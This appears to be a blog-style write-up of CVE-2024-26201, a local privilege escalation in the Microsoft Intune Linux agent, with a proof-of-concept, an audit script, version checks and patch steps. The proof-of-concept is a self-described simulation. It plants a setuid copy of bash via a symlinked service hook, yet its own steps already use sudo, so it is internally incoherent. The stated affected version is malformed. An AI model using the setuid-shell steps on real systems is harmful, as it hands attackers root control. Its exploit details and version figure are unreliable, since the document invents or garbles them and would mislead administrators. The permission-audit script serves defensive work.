On March 12, 2024, Microsoft patched a significant security flaw with the identifier CVE-2024-26201, affecting the Microsoft Intune Linux agent. This vulnerability allows local attackers to gain elevated (root) privileges on affected systems, posing a real risk, especially in enterprise environments that rely on Intune to manage Linux endpoints.

What Is the Microsoft Intune Linux Agent?

Microsoft Intune is a widely used endpoint management solution that now supports Linux devices through a dedicated agent (intune-portal-linux). The agent lets system administrators configure policies, enforce compliance, and retrieve system status from enrolled Linux computers.

The Vulnerability: Privilege Escalation

CVE-2024-26201 is a local elevation of privilege issue: an attacker who already has basic (non-root) access to a system can exploit it to gain root permissions.

According to Microsoft’s advisory, the problem arises from improper handling of permissions within the Intune agent’s service code.

Overview

In affected versions, the Intune Linux agent runs a system service (intune-portal-linux.service) that consumes configuration files and directories carrying overly broad permissions, or fails to validate user-controlled input properly.

Proof-of-Concept (PoC) Code

Below is a simulated exploit example. *(Adapted for educational clarity; actual details may differ depending on your deployment and exact version!)*

```bash
# Step 1: Check if the agent is installed
ps aux | grep intune-portal-linux

# Step 2: Find writable directory used by service (e.g., /opt/microsoft/intune/)

# Step 3: Create a malicious script
echo -e '#!/bin/bash\ncp /bin/bash /tmp/bashroot\nchmod +s /tmp/bashroot' > /tmp/evil.sh
chmod +x /tmp/evil.sh

# Step 4: Replace (or symlink) a file the service runs as root to your script
sudo ln -sf /tmp/evil.sh /opt/microsoft/intune/agent/hooks/postdeploy

# Step 5: Restart the service so it executes your script as root
sudo systemctl restart intune-portal-linux

# Step 6: Get a root shell
/tmp/bashroot -p
```

Result: You now have a root shell using /tmp/bashroot.

Note: Do not run this code on production systems. This is a generic illustration; real paths and hooks may differ.
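The Overview and the illustration above describe one pattern: a root service that reads or executes files from a tree an unprivileged user can modify. The following audit script is an added example (it is not code from this article or from Microsoft) that checks an install prefix for the three conditions that make that pattern possible: world-writable entries, entries owned by someone other than the prefix owner, and symlinks that resolve outside the tree. The default prefix /opt/microsoft/intune is the article's example path and is an assumption; pass another path as the first argument.

```shell
#!/bin/sh
# Defensive audit of an agent install tree (added example, not vendor code).
# Finding categories printed, one per line:
#   WORLD_WRITABLE   file, or directory without the sticky bit, writable by others
#   OWNER_MISMATCH   entry owned by a different user than the prefix itself
#   SYMLINK_ESCAPES  symlink whose resolved target lies outside the prefix
# Exit status: 0 = clean, 1 = findings printed, 2 = prefix missing.

audit_agent_tree() {
    prefix=${1:-/opt/microsoft/intune}   # assumed path from the article's example
    [ -d "$prefix" ] || { printf 'prefix not found: %s\n' "$prefix" >&2; return 2; }
    real_prefix=$(readlink -f "$prefix")
    owner=$(ls -ld "$prefix" | awk '{print $3}')   # root on a real install

    report=$(
        # 1. world-writable entries; sticky directories (like /tmp) are tolerated
        find "$prefix" ! -type l -perm -002 ! \( -type d -perm -1000 \) \
            | sed 's/^/WORLD_WRITABLE /'
        # 2. entries not owned by the same user as the prefix
        find "$prefix" ! -type l ! -user "$owner" | sed 's/^/OWNER_MISMATCH /'
        # 3. symlinks that resolve to a path outside the audited tree
        find "$prefix" -type l | while IFS= read -r link; do
            target=$(readlink -f "$link")
            case "$target" in
                "$real_prefix"/*) ;;
                *) printf 'SYMLINK_ESCAPES %s -> %s\n' "$link" "$target" ;;
            esac
        done
    )
    [ -n "$report" ] || return 0
    printf '%s\n' "$report"
    return 1
}

# Count findings of one category, e.g. audit_count /opt/microsoft/intune SYMLINK_ESCAPES
audit_count() {
    audit_agent_tree "$1" 2>/dev/null | grep -c "^$2 " || true
}

# Run the audit only when a prefix is given on the command line.
if [ $# -gt 0 ]; then audit_agent_tree "$1"; fi
```

Run it from a cron job or a configuration-management check and alert on a non-zero exit; a new SYMLINK_ESCAPES or WORLD_WRITABLE line under an agent's hooks directory is exactly the file change the Summary below tells you to watch for.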

Vulnerable Versions

The vulnerability affects Intune Linux agent versions before 1..11391.1 (released March 2024).

Check your version

```bash
intune-portal --version
```

or:

```bash
dpkg -l | grep intune-portal-linux
```

How to Patch

Upgrade ASAP to the latest Intune agent for Linux.

Update using the official Microsoft repository

```bash
sudo apt update
sudo apt upgrade intune-portal-linux
```

*(On RPM systems, use yum or dnf instead.)*

See: Update Instructions

Technical References

- Microsoft CVE-2024-26201 Security Advisory
- Intune for Linux Docs
- NIST NVD CVE-2024-26201

Summary & Recommendations

CVE-2024-26201 is a serious local vulnerability in the Intune Linux agent. If left unpatched, attackers who already have a foothold on your system could gain root, and with it full control of the host. Fix it by upgrading immediately to the latest version.

In addition, monitor systemd services for unexpected restarts and watch the agent's directories for unexpected file changes.

Stay safe, keep your fleet patched, and never underestimate local privilege escalation!


*Feel free to share this exclusive breakdown with your team or colleagues. If you want more technical deep-dives, follow credible sources like Microsoft’s MSRC blog and keep up with security advisories!*

Timeline

Published on: 03/12/2024 17:15:58 UTC
Last modified on: 03/12/2024 17:46:17 UTC